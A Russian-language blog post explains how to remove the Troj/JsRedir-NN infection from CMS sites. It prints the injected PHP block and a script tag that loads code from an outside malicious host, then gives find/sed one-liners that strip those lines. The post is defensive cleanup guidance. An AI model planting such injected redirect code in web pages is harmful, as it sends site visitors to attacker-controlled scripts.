Вирус Troj/JsRedir-NN это не компьютерный вирус, а вирус взломавший ваш сайт. У него есть множество модификаций, более ранних с которыми легко справлялись, однако Troj/JsRedir-NN более новая модификация , описания ее лечения еще нет в интернете и я собираюсь об этом написать в данной статье.
Что такое Troj/JsRedir-NN
Итак данный вирус Troj/JsRedir-NN поражает в основном популярные CMS сайтов типа Joomla, WordPress и другие известные. По сути является перенаправлением на другой сайт вида :
<script type=»text/javascript» src=»http://areaftp.lasercom.it/test/cgi/cnrtjy89.php?id=8173931″></script>
В моем случае он поразил все php файлы движка, несколько .js файлов и даже несколько .html.
Лечение Troj/JsRedir-NN
Для лечения Troj/JsRedir-NN рассмотрим его подробнее. В PHP файлах он вставляется такой конструкцией, которая как мы видим вызывает сама себя, и вставляет кусок скрипта в любой файл КМС .
#14b77e#
if(empty($sjnqy)) {
$sjnqy = «<script type=\»text/javascript\» src=\»http://areaftp.lasercom.it/test/cgi/cnrtjy89.php?id=8172285\»></script>»;
echo $sjnqy;
}
#/14b77e#
По хорошему нам надо удалить 4 строчки между комментариями. Сделать это автоматически довольно сложно, так как в разных файлах вирус меняет вхождения окончания ?id=8172285 на любые цифры, в результате чего поиск строк не приведет к хорошему результату. Но наработанное решение есть. Если ваш хостинг поддерживает SSH то вы можете избавится от вируса за 3 секунды, а именно, подключаетесь к серверу и задаете команду:
find -name ‘*.php’ -exec sed -i ‘/cnrtjy89/d’ {} \;
Таким образом мы ищем во всех php файлах вхождение строки cnrtjy89 что является уникальным вхождением вирусной строчки Troj/JsRedir-NN, врядли ваши скрипты на сайте используют похожую строку, иначе они тоже порежутся, после нахождения данной строки команда затирает всю строку целиком, в результате у нас остается:
#14b77e#
if(empty($sjnqy)) {echo $sjnqy;
}
#/14b77e#
Что является абсолютно безвредным кодом. Далее то же самое можно сделать для всех js файлов, но для начала проверьте зараженные js файлы, возможно строка <script type=\»text/javascript\» src=\»http://areaftp.lasercom.it/test/cgi/cnrtjy89.php?id=8172285\»></script> добавлялась уже к какой то другой строке файла, таким образом у вас удалятся важные скрипты.
Строка для js:
find -name ‘*.js’ -exec sed -i ‘/cnrtjy89/d’ {} \;
Для окончательного добивания вируса заходим в панели вебмастера яндекс и гугл и отправляем сайт на перепроверку от вирусов, там же есть основные зараженные страницы, если сайт не вылечится целиком, то останется несколько страниц, которые надо будет проанализировать и повторно применить лечение. Возможно это какие то html страницы , из обычно немного и можно пролечить и в ручную.
После этого конечно же надо провести полную ревизию сайта на шеллы, с помощью скрипта AI-bolit либо любых других.
Рейтинг:
0
0
Это все понятно, а как предотвратить его, что лучше установить?